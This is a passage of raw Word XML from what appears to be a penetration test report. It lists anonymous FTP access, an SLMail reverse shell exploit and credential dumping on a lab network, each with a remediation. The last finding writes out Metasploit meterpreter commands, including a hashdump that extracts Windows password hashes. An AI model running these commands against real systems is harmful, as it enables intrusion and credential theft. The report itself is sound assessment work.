          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000300">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4210050" cy="276225"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="32"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421005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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3149600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="27"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4191000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="30"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1752600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="37"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46577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06">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000308">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20:80 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030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0A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Blocking incoming http connections or only allow from specific addresses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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0D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 22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0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0F">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10">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP Connection / Anonymous Login </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Window OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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15">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">An nmap scan showed that anonymous ftp access was possible system files via anonymous FTP protocol. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">anonymous;anonymous </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000318">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19">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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4000500" cy="1190625"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="22"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40005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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4029075" cy="1524000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="33"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4029075" cy="1524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1C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20:24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031E">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1F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Navigate to the ftp applications authentication page and disable anonymous authentication.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000320">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Additionally disallow ftp connection except from specific addresses that require it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000321">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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24">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 23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2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26">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27">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SLMail SMTP POP3 Vulnerability / Reverse TCP Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000328">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Windows OS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032A">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">It was possible to exploit an SLMail 5.5 RCE vulnerability to create a shell session. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032E">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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2273300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="39"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="723900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="36"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="965200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="38"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1638300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="26"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="596900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="10"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4657725" cy="596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35">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20:110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">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38">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apply Vendor Patch / Apply Input Sanitation to avoid input buffer overflows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000339">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000341">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000342">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000343">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000344">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000345">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000346">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000347">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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49">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 24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4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4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4C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dumping Creds Using Metasploit / Kiwi </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034F">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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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51">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Following on from successfully starting a reverse tcp shell using the SLMail Exploit. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000353">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000354">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">running:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000355">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; getuid </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000356">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Confirms that we are NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000357">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; run post/windows/gather/hashdump</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Gets boot key &gt; Decrypts User Keys &gt; Dumps users and passwords </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000359">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">running:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
